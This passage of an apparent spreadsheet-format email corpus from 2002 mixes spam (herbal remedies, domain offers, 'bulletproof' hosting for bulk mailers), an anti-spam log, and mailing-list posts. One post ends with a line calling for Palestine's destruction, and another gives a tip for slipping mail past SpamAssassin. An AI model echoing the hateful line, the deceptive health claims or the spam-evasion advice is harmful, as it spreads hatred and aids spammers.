 6.    Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz.
 **  3-pack  (3 - 4 oz. bottles)     $83.00
 **  6-pack  (6 - 4 oz. bottles)     $126.00 (save $40.00)
 **  9-pack  (9 - 4 oz. bottles)     $159.00 (save $90.00)
 **  12-pack (12 - 4 oz. bottles)    $192.00 (save $140.00)
 7.    Dynamic Duo Introductory Offers 
 **  3-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $126.00 (save $40.00)
 **  6-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $159.00 (save $50.00)
 **  9-pack Equivalence Tabs &amp; 6-pack Dragon Wing   $215.00 (save $70.00)
 **  12-pack Equivalence Tabs &amp; 9-pack Dragon Wing  $271.00 (save $80.00)
 8.   SWEET APHRODISIA INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; one, 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.  For $150.00 (Reg. $205.00  Save $55)  (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 9.   BODY, MIND, SPIRIT "HEAVENLY" INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka.  For $125.00 (Reg. $155.00  Save $30) (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 10.  "PURE ENERGY" INTRO COMBINATION OFFER 
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity.  For $170.00 (Reg. $245.00  Save $75)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text)
 11.  "SENSITIVE" PREFERENTIAL INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity For $200.00 (Reg. $285.00  Save $85)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 12.  ULTIMATE HERBACEOUSNESS INTRO COMBINATION OFFER
 Includes one - 2.0 oz. jigget / bar of Seventh Heaven Temple 3, one - 1 oz. bottle of Sweet Vjestika Aphrodisia Drops, one - 100 tablet tin of Prosaka, and one - 300 count jar of Gentle Ferocity for a deep discounted Retail Price of $260.00 (Reg. $375.00  Save $115)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 SPECIAL OFFER:  For a limited time only, you will receive a FREE personal brass hookah with the Ultimate Herbaceous Intro Offer as our gift to you.  This hookah has a retail value of $25.00. 
 **************************************************
 Do Not Forget To Ask for the 2 for 1 Special !
 Call Now 1-623-974-2295 
 ASK  FOR THE DEAL !!
 ORDERING INFORMATION:
 For your convenience, you can call us direct with your orders or questions.
  7 Days a Week -- 10:30 AM to 7:00 PM (Mountain Time)
 To place an order via credit card or for customer assistance &amp; product information, please call 1-623-974-2295    (all orders are shipped next day via US Postal domestic and international Priority Mail) Beyond business hours, please enjoy automated convenience.  Leave your name and phone number and a convenient time to return your call.  Certainly, we will be happy to do so. Thank you for your kind attention.  
 For all domestic orders, add $6.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.
 **************************************************
 ====================================================
 To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Preproc erasing message
</t>
  </si>
  <si>
    <t xml:space="preserve">The following razor debugging sequence show my mail going from 9295 bytes to
 0 bytes after the preproc runs, which gives me an exit code that is not 0.
 I included the message below.
 Fox
 Razor-Log: No /etc/razor/razor-agent.conf found, skipping.
 Razor-Log: No razor-agent.conf found, using defaults.
 Aug 26 10:28:09.225237 check[3469]: [ 1] [bootup] Logging initiated
 LogDebugLevel=9 to stdout
 Aug 26 10:28:09.225890 check[3469]: [ 5] computed razorhome=/etc/razor,
 conf=, ident=/etc/razor/identity
 Aug 26 10:28:09.226006 check[3469]: [ 2] Razor-Agents v2.14 starting
 razor-check -d -home=/etc/razor
 Aug 26 10:28:09.229704 check[3469]: [ 9] uname -a: Linux qmail.mckee.com
 2.4.8-34.1mdk #1 Mon Nov 19 12:40:39 MST 2001 i686 unknown
 Aug 26 10:28:09.230155 check[3469]: [ 8] reading straight RFC822 mail from
 Aug 26 10:28:09.231524 check[3469]: [ 6] read 1 mail
 Aug 26 10:28:09.231923 check[3469]: [ 8] Client supported_engines: 1 2 3 4
 Aug 26 10:28:09.233017 check[3469]: [ 8] prep_mail done: mail 1 headers=631,
 mime0=9295
 Aug 26 10:28:09.233434 check[3469]: [ 6] skipping whitelist file (empty?):
 /etc/razor/razor-whitelist
 Aug 26 10:28:09.233995 check[3469]: [ 5] read_file: 1 items read from
 /etc/razor/servers.discovery.lst
 Aug 26 10:28:09.234369 check[3469]: [ 5] read_file: 1 items read from
 /etc/razor/servers.nomination.lst
 Aug 26 10:28:09.234697 check[3469]: [ 5] read_file: 3 items read from
 /etc/razor/servers.catalogue.lst
 Aug 26 10:28:09.235184 check[3469]: [ 9] Assigning defaults to
 honor.cloudmark.com
 Aug 26 10:28:09.235415 check[3469]: [ 9] Assigning defaults to
 truth.cloudmark.com
 Aug 26 10:28:09.235624 check[3469]: [ 9] Assigning defaults to
 fire.cloudmark.com
 Aug 26 10:28:09.235830 check[3469]: [ 9] Assigning defaults to
 apt.cloudmark.com
 Aug 26 10:28:09.236715 check[3469]: [ 5] read_file: 11 items read from
 /etc/razor/server.truth.cloudmark.com.conf
 Aug 26 10:28:09.237368 check[3469]: [ 5] read_file: 11 items read from
 /etc/razor/server.fire.cloudmark.com.conf
 Aug 26 10:28:09.237825 check[3469]: [ 5] 149643 seconds before closest
 server discovery
 Aug 26 10:28:09.238135 check[3469]: [ 6] truth.cloudmark.com is a Catalogue
 Server srl 51; computed min_cf=1, Server se: 0B
 Aug 26 10:28:09.238414 check[3469]: [ 8] Computed supported_engines: 1 2 4
 Aug 26 10:28:09.238656 check[3469]: [ 8] Using next closest server
 truth.cloudmark.com:2703, cached info srl 51
 Aug 26 10:28:09.238871 check[3469]: [ 8] mail 1 Subject: New Freeware
 Download
 Aug 26 10:28:09.290618 check[3469]: [ 6] preproc: mail 1.0 went from 9295
 bytes to 0, erasing
 Aug 26 10:28:09.291100 check[3469]: [ 5] Connecting to truth.cloudmark.com
 ...
 Aug 26 10:28:09.505431 check[3469]: [ 8] Connection established
 Aug 26 10:28:09.505662 check[3469]: [ 4] truth.cloudmark.com &gt;&gt; 29 server
 greeting: sn=C&amp;srl=51&amp;ep4=7542-10&amp;a=l
 Aug 26 10:28:09.506086 check[3469]: [ 6] truth.cloudmark.com is a Catalogue
 Server srl 51; computed min_cf=1, Server se: 0B
 Aug 26 10:28:09.506342 check[3469]: [ 8] Computed supported_engines: 1 2 4
 Aug 26 10:28:09.506604 check[3469]: [ 8] mail 1.0 skipped in check
 Aug 26 10:28:09.506686 check[3469]: [ 5] No queries, no spam
 Aug 26 10:28:09.506787 check[3469]: [ 5] disconnecting from server
 truth.cloudmark.com
 Aug 26 10:28:09.507071 check[3469]: [ 4] truth.cloudmark.com &lt;&lt; 5
 Aug 26 10:28:09.507155 check[3469]: [ 6] a=q
 Aug 26 10:28:09.507959 check[3469]: [ 8] razor-check finished successfully.
 &gt;&gt;From bounce-html-sales1-21787251@lyris.execsoft.com Mon Aug 26 14:28:10 2002
 Return-Path: &lt;bounce-html-sales1-21787251@lyris.execsoft.com&gt;
 Delivered-To: log@qmail.mckee.com
 Received: (qmail 3472 invoked from network); 26 Aug 2002 14:28:10 -0000
 Received: from unknown (HELO port-216-3073879-ds200.devices.datareturn.net)
 (216.46.231.87)
   by 10.97.5.1 with SMTP; 26 Aug 2002 14:28:05 -0000
 X-Mailer: Lyris Web Interface
 Date: Sat, 24 Aug 2002 09:45:48 -0700
 Subject: New Freeware Download
  - Jammed: eric_koester@ccmail.mckee.com
 To: &lt;trollbox@dustpuppy.mckee.com&gt;
 From: "Diskeeper Product Manager, Executive Software"
 &lt;executive@executive.com&gt;
 List-Unsubscribe: &lt;mailto:leave-html-sales1-21787251A@lyris.execsoft.com&gt;
 Reply-To: executive@executive.com
 Message-Id:
 &lt;LYRIS-21787251-20123-2002.08.24-09.47.15--eric_koester#ccmail.mckee.com@lyr
 is.execsoft.com&gt;
 MIME-Version: 1.0
 Content-Type: text/html; charset=us-ascii
 Spam-File:
 Envelope-Recipient: eric_koester@ccmail.mckee.com
 &lt;!------------------------------------------------------------
 Is Maximum System Performance and Reliablilty Important to you?
 Find out what you are missing!
 New Diskeeper Lite for Windows.
 IT'S FREE!
 * Includes the same advanced defragmentation technology used in
   Diskeeper 7.0.
 * Is much faster than the previous Diskeeper Lite and all
   built-in defragmenters.
 * Now runs on Windows NT/98/2000/XP.
 Millions of downloads attest to the popularity of Diskeeper Lite,
 but it only ran on Windows NT 4.0. Now it's been updated for all
 Windows operating systems from Windows 98 onward.
 New Diskeeper Lite is still manual-only and cannot be scheduled
 or run across a network, but it is far superior to any built-in
 defragmenter and much faster. And it will show you why full-version
 Diskeeper is the most recommended automatic defragmenter ever
 built.
 Find out what you are really missing. Free!
 http://www.execsoft.com/downloads/survey.asp?PId=15&amp;ad=dkldl3
 ----------------------------------------------------------------------
 NOTICE: We periodically send new product information electronically or
 survey those individuals who voluntarily give us their e-mail address.
 We hope you enjoy receiving this timely information. However, if you
 would like to remove yourself from this list, please do not reply to
 this e-mail to be removed.
 To unsubscribe, send your e-mail address in the body of a message
 along with your name, on a separate line, to unsubscribe@executive.com.
 ----------------------------------------------------------------------------
 ----
  2002 Executive Software International, Inc. All Rights Reserved.
 DISKEEPER, Executive Software and the Executive Software logo are either
 registered trademarks or trademarks of Executive Software International,
 Inc. in the United States and/or other countries. Windows and Windows NT
 are registered trademarks of Microsoft Corporation in the United States
 and/or other countries. All other trademarks and brand names are the
 property of the respective owners.
 -------------------------------------------------------------&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;New Freeware Download&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
         &lt;p align="center"&gt;
         &lt;img border="0" src="http://www2.execsoft.com/max-perf_speedo.jpg"
 width="537" height="121"&gt;&lt;img border="0"
 src="http://www2.execsoft.com/n-dkl_082302.jpg" width="470"
 height="106"&gt;&lt;/p&gt;
         &lt;table border="0" cellpadding="2" cellspacing="0"
 style="border-collapse: collapse" bordercolor="#111111" width="100%"
 id="AutoNumber2"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;
             &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Verdana" color="#ff0000"
 size="5"&gt;IT'S
         FREE!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
 &lt;table border="0" cellpadding="4" cellspacing="0" style="border-collapse:
 collapse" bordercolor="#111111" width="100%" id="AutoNumber1"&gt;
 &lt;tr&gt;
     &lt;td width="15" valign="top"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/td&gt;
     &lt;td width="15" valign="top"&gt;
     &lt;p&gt;&lt;font face="Times New Roman" size="2"&gt;
     &lt;span style="FONT-SIZE: 10pt"&gt;
     &lt;img src="http://www2.execsoft.com/chk-mark.gif" border="0" width="15"
 height="14"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="100%" valign="top"&gt;&lt;font face="Verdana"&gt;Includes the same
 advanced defragmentation technology
 used in Diskeeper 7.0.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="15" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="15" valign="top"&gt;&lt;font face="Times New Roman" size="2"&gt;
     &lt;span style="FONT-SIZE: 10pt"&gt;
     &lt;img src="http://www2.execsoft.com/chk-mark.gif" border="0" width="15"
 height="14"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="100%" valign="top"&gt;&lt;font face="Verdana"&gt;Much faster than the
 previous
     Diskeeper Lite and all built-in defragmenters.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="15" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="15" valign="top"&gt;&lt;font face="Times New Roman" size="2"&gt;
     &lt;span style="FONT-SIZE: 10pt"&gt;
     &lt;img src="http://www2.execsoft.com/chk-mark.gif" border="0" width="15"
 height="14"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="100%" valign="top"&gt;&lt;font face="Verdana"&gt;Now runs on Windows
 NT&lt;sup&gt;&lt;/sup&gt;/98/2000/XP.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;Millions of downloads attest to the popularity of
 Diskeeper Lite, but it only ran on Windows NT 4.0. Now it's been updated
 for all
 Windows operating systems from Windows 98 onward.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;New Diskeeper Lite is still manual-only and cannot
 be
 scheduled or run across a network, but it is far superior to any built-in
 defragmenter and much faster. And it will show you why full-version
 Diskeeper is
 the most recommended automatic defragmenter ever built. &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana"&gt;Find out what you are &lt;i&gt;really&lt;/i&gt; missing.
 Free!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="TEXT-ALIGN: center" align="center"&gt;
 &lt;span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;
 &lt;font face="Arial" size="2"&gt;
 &lt;a href="http://www.execsoft.com/downloads/survey.asp?PId=15&amp;ad=dkldl3"&gt;
 &lt;img src="http://www2.execsoft.com/dlnowbut.gif" border="0" width="195"
 height="25" alt="Download Diskeeper Lite"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;table border="0" cellpadding="2" cellspacing="0"
 style="border-collapse: collapse" bordercolor="#111111" width="100%"
 id="AutoNumber4"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;span style="FONT-FAMILY: Verdana"&gt;&lt;font
 size="2"&gt;
             Full version Diskeeper
 available for purchase from:&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;div align="center"&gt;
           &lt;center&gt;
         &lt;table border="1" cellpadding="2" cellspacing="0"
 style="border-collapse: collapse" bordercolor="#111111" width="620"
 id="AutoNumber3"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;
             &lt;p align="center"&gt;
 &lt;span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;
             &lt;map name="FPMap0"&gt;
             &lt;area
 href="http://www.buy.com/retail/searchresults.asp?orderby=4&amp;querytype=&amp;qutyp
 e=0&amp;qu=diskeeper&amp;pagereq=1&amp;alpha=&amp;alpha2=&amp;deptid=0&amp;mfgpartno=&amp;mfgid=0&amp;search
 id=0&amp;loc=105&amp;search_store=2" shape="rect" coords="491, 25, 576, 49"&gt;
             &lt;area
 href="http://www2.warehouse.com/search/pppsmainsearch.asp?home=micro&amp;qu=disk
 eeper&amp;imenu=&amp;so=X&amp;Search.x=6&amp;Search.y=12" shape="rect" coords="191, 69, 328,
 101"&gt;
             &lt;area
 href="http://www.pcconnection.com/scripts/searchresults.asp?BasicSrchText=di
 skeeper&amp;SR=1&amp;ER=10&amp;TR=0&amp;ST=BS&amp;PP=0&amp;sortval=Price&amp;plattype=A&amp;Search.x=40&amp;Sear
 ch.y=12" shape="rect" coords="3, 8, 165, 52"&gt;
             &lt;area
 href="http://www.softchoice.com/software/prod_description.asp?5445x$qJpibFSc
 VSPL34dNX1NpKIC7k0y8w2JTWf0TJAZv16neAteuE$2jAUDdqSkqd22U8RG_ODIY1ZVd0ZK2FJBL
 pFHM1p8InrYf$$dQNb9amrhiAmTmLZzs6Jg4VvRqWW09_ng7ABuhLAPrzhNCfBQIlCQ25pKQimn$
 HCmHgoBko9i4bo43b9ggk2ngYvPiimlN6" shape="rect" coords="196, 5, 334, 52"&gt;
             &lt;area
 href="http://www.softwareshelf.com/products/execsoftprod.asp?p=5"
 shape="rect" coords="1, 70, 167, 101"&gt;
             &lt;area
 href="http://www.staples.com/Catalog/Browse/sku.asp?PageType=1&amp;Sku=490710&amp;bc
 Flag=True&amp;bcCatId=0&amp;bcCatName=Software,+Books+&amp;+Training&amp;bcDeptId=1443&amp;bcDep
 tName=Utilities&amp;bcClassId=140505&amp;bcClassName=System+Maintenance"
 shape="rect" coords="362, 4, 459, 50"&gt;
             &lt;area href="http://shop2.outpost.com/product/3196730"
 shape="rect" coords="357, 70, 437, 122"&gt;
             &lt;area href="http://www.asap.com/execsoftware/2001Q11.htm"
 shape="rect" coords="484, 72, 613, 117"&gt;
             &lt;/map&gt;
             &lt;img border="0"
 src="http://www2.execsoft.com/logos_resell_082302.gif" usemap="#FPMap0"
 width="620" height="124"&gt;&lt;/span&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
 &lt;hr noshade color="#E4E4E4"&gt;
 &lt;FONT SIZE="1" FACE="Verdana"&gt;&lt;B&gt;
 &lt;FONT COLOR="#FF0000"&gt;NOTICE:&lt;/FONT&gt;&lt;/B&gt; We periodically send new product
 information electronically or
 survey those individuals who voluntarily give us their e-mail address. We
 hope you enjoy receiving this timely information. However, if you would
 like to remove yourself from this list, please do not reply to this e-mail
 to be removed.&lt;/FONT&gt;&lt;/span&gt;&lt;span style="FONT-FAMILY: Verdana"&gt;&lt;font
 size="1"&gt;
 &lt;/font&gt;&lt;/span&gt;
 &lt;span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;
 &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;You have received this message from
 esi-vp-marketing at the e-mail
 address: eric_koester@ccmail.mckee.com
 &lt;BR&gt; To unsubscribe, send the above e-mail address in the body of a message
 along with your name, on a separate line, to
 &lt;A HREF="mailto:unsubscribe@executive.com?subject=Unsubscribe%20
 eric_koester@ccmail.mckee.com" &gt; unsubscribe@executive.com&lt;/A&gt;.&lt;/FONT&gt;&lt;/P&gt;
 &lt;hr noshade color="#E4E4E4"&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt; 2002 Executive Software International,
 Inc.
 All Rights Reserved. DISKEEPER, Executive Software and the Executive
 Software
 logo are either registered trademarks or trademarks of Executive Software
 International, Inc. in the United States and/or other countries. Windows
 and
 Windows NT are registered trademarks of Microsoft Corporation in the
 United
 States and/or other countries. All other trademarks and brand names are
 the
 property of the respective owners.&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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Email Marketing Works
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;p&gt;&lt;Strong&gt;E-Marketing Specials:&lt;/strong&gt;&lt;/pp&gt;
 &amp;nbsp;&lt;p&gt;&amp;nbsp;
 &lt;ul&gt;
   &lt;li&gt;
 Bulletproof hosting $200 per month/ no setup fee.&amp;nbsp;&lt;/li&gt;
   &lt;li&gt;
 Bulletproof POP3 Mailboxes. $200 per month $100 set up.&amp;nbsp;&lt;/li&gt;
   &lt;li&gt;
 Daily Relay Service $100 per month.
 Hosting and POP3 $350 per month no setup.&amp;nbsp;&lt;/li&gt;
   &lt;li&gt;
 All 3 $400 per month no setup.&amp;nbsp;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;
 Purchase any of the above packages and you receive
 free membership to the $99 club.&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;
 FOR MORE INFO: &lt;A HREF="mailto:cowboy1965@btamail.net.cnt?Subject=More 99 Email MarketingI nfo!"&gt;Click HERE&lt;/A&gt;&amp;nbsp;&lt;/p&gt;
 To Remove Your Address From Our Mailing List: &lt;A HREF="mailto:cowboy1965@btamail.net.cn?Subject=Remove Me"&gt;Click HERE&lt;/A&gt;&amp;nbsp;
 &lt;FONT SIZE="-1" FACE="MS Sans Serif" COLOR="Navy"&gt;&lt;/FONT&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;/font&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: don't proscrastinate...it's only $14.95 per year
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00B6_07E34C7A.C3030C43
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SU1QT1JUQU5UIElORk9STUFUSU9OOg0KDQpUaGUgbmV3IGRvbWFpbiBuYW1l
 cyBhcmUgZmluYWxseSBhdmFpbGFibGUgdG8gdGhlIGdlbmVyYWwgcHVibGlj
 IGF0IGRpc2NvdW50IHByaWNlcy4gTm93IHlvdSBjYW4gcmVnaXN0ZXIgb25l
 IG9mIHRoZSBleGNpdGluZyBuZXcgLkJJWiBvciAuSU5GTyBkb21haW4gbmFt
 ZXMsIGFzIHdlbGwgYXMgdGhlIG9yaWdpbmFsIC5DT00gYW5kIC5ORVQgbmFt
 ZXMgZm9yIGp1c3QgJDE0Ljk1LiBUaGVzZSBicmFuZCBuZXcgZG9tYWluIGV4
 dGVuc2lvbnMgd2VyZSByZWNlbnRseSBhcHByb3ZlZCBieSBJQ0FOTiBhbmQg
 aGF2ZSB0aGUgc2FtZSByaWdodHMgYXMgdGhlIG9yaWdpbmFsIC5DT00gYW5k
 IC5ORVQgZG9tYWluIG5hbWVzLiBUaGUgYmlnZ2VzdCBiZW5lZml0IGlzIG9m
 LWNvdXJzZSB0aGF0IHRoZSAuQklaIGFuZCAuSU5GTyBkb21haW4gbmFtZXMg
 YXJlIGN1cnJlbnRseSBtb3JlIGF2YWlsYWJsZS4gaS5lLiBpdCB3aWxsIGJl
 IG11Y2ggZWFzaWVyIHRvIHJlZ2lzdGVyIGFuIGF0dHJhY3RpdmUgYW5kIGVh
 c3ktdG8tcmVtZW1iZXIgZG9tYWluIG5hbWUgZm9yIHRoZSBzYW1lIHByaWNl
 LiAgVmlzaXQ6IGh0dHA6Ly93d3cuYWZmb3JkYWJsZS1kb21haW5zLmNvbSB0
 b2RheSBmb3IgbW9yZSBpbmZvLg0KIA0KUmVnaXN0ZXIgeW91ciBkb21haW4g
 bmFtZSB0b2RheSBmb3IganVzdCAkMTQuOTUgYXQ6IGh0dHA6Ly93d3cuYWZm
 b3JkYWJsZS1kb21haW5zLmNvbS8gIFJlZ2lzdHJhdGlvbiBmZWVzIGluY2x1
 ZGUgZnVsbCBhY2Nlc3MgdG8gYW4gZWFzeS10by11c2UgY29udHJvbCBwYW5l
 bCB0byBtYW5hZ2UgeW91ciBkb21haW4gbmFtZSBpbiB0aGUgZnV0dXJlLg0K
 IA0KU2luY2VyZWx5LA0KIA0KRG9tYWluIEFkbWluaXN0cmF0b3INCkFmZm9y
 ZGFibGUgRG9tYWlucw0KDQoNClRvIHJlbW92ZSB5b3VyIGVtYWlsIGFkZHJl
 c3MgZnJvbSBmdXJ0aGVyIHByb21vdGlvbmFsIG1haWxpbmdzIGZyb20gdGhp
 cyBjb21wYW55LCBjbGljayBoZXJlOg0KaHR0cDovL3d3dy5jZW50cmFscmVt
 b3ZhbHNlcnZpY2UuY29tL2NnaS1iaW4vZG9tYWluLXJlbW92ZS5jZ2kNCihl
 MSkNCjE4MDRGZlJvMy04MDBCWktmNzM2OExpR243LTcwMGRCVGU4NTc2ekhX
 b2w0MA==
</t>
  </si>
  <si>
    <t xml:space="preserve">she read the links. what must it be like, she wondered, to devote ones life
 to pointing out  neighbors' mistakes, mishaps, inconsistencies and
 frailties?
 gloating is definitely underrated in the good book - eh, john?
 bring it on,
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
 Hall
 Sent: Saturday, October 05, 2002 11:56 PM
 To: FoRK
 Subject: Our friends the Palestinians, Our servants in government.
 Hijacker High (8/30)
 Dalal Mughrabi was a Palestinian woman who participated in a 1978 bus
 hijacking in which 36 Israelis and an American nature photographer, Gail
 Ruban, were killed. Mughrabi has a Palestinian high school named after
 her, and it's apparently starting to show signs of wear. Fortunately,
 the United States Agency for International Development has stepped in
 with money to help renovate it.
 http://reason.com/brickbats/bb-april.shtml
 Links to:
 http://www.cnsnews.com/ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
 ve\200208\FOR20020807e.html
 Praeterea censeo Palestininem esse delendam.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Evil Gerald Online - Breaking News
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C21D04.16C6D7C0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Get another fix of Ireland's Only Newspaper with a large dose of =
 Breaking News
 The Evil Gerald Staff
 ------=_NextPart_000_0007_01C21D04.16C6D7C0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 5.50.4916.2300" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;Get another fix of &lt;A=20
 href=3D"http://www.evilgerald.com"&gt;Ireland's Only Newspaper &lt;/A&gt;with a =
 large dose=20
 of &lt;A href=3D"http://www.evilgerald.com/Breaking_news.htm"&gt;Breaking=20
 News&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;The Evil Gerald =
 Staff&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0007_01C21D04.16C6D7C0--
</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know for skimming that article which D&amp;D (dunderheads and disease?
 Dowry and Dissent? Durer and Durant?) was given firmament, but the 
 title's a bit redundant.  Can we drop the "Al-" somehow?
 JBIG is sweet.
 My scanner driver is not.
 Remind me how to ask for UHCI detail knowledgebases
 I ent got.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] Re: [Python-Dev] Getting started with GBayes testing
</t>
  </si>
  <si>
    <t xml:space="preserve">On 06 September 2002, Anthony Baxter said:
 &gt; A snippet, hopefully not enough to trigger the spam-filters.
 As an aside: one of the best ways to dodge SpamAssassin is by having an
 In-Reply-To header.  Most list traffic should meet this criterion.
 Alternately, I can whitelist mail to spambayes@python.org -- that'll
 work until spammers get ahold of the list address, which usually seems
 to take a few months.
         Greg
 -- 
 Greg Ward &lt;gward@python.net&gt;                         http://www.gerg.ca/
 Gee, I feel kind of LIGHT in the head now, knowing I can't make my
 satellite dish PAYMENTS!
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-1317289252P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Wed, 21 Aug 2002 10:40:39 -0500
 &gt;
 &gt; &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500
 &gt; &gt;
 &gt; &gt; Ouch...I'll get right on it.
 &gt; &gt; 
 &gt; &gt; &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700
 &gt; &gt; &gt;
 &gt; &gt; &gt; Any chance of having that lengthen instead?   I like all my exmh stuff
 &gt; &gt; &gt; in nice columns (fits the display better).   That is, I use the detache
 &gt; d
 &gt; &gt; &gt; folder list, one column.   The main exmh window takes up full screen,
 &gt; &gt; &gt; top to bottom, but less than half the width, etc...
 &gt; 
 &gt; I thought about that.  The first order approximation would be to just add 
 &gt; using pack .... -side top instead of pack ... -side left, however, since their 
 &gt; each a different width, it would look funny.
 I've done this.  It's not as pretty as I think it should be, but it works.  
 I'm going to leave the cosmetic issues to others.  When I update the 
 documentation, I'll add this to the exmh.TODO file.
 I'm leaving for a 2 1/2 week vacation in a week, so this is the last new 
 functionality I'm going to add for a while.  Also, I now have pretty much 
 everything in there that I want for my own use, so I'm probably pretty much 
 done.  I'll work on bug fixes and documentation before my vacation, and 
 hopefully do nothing more afterwards.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-1317289252P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
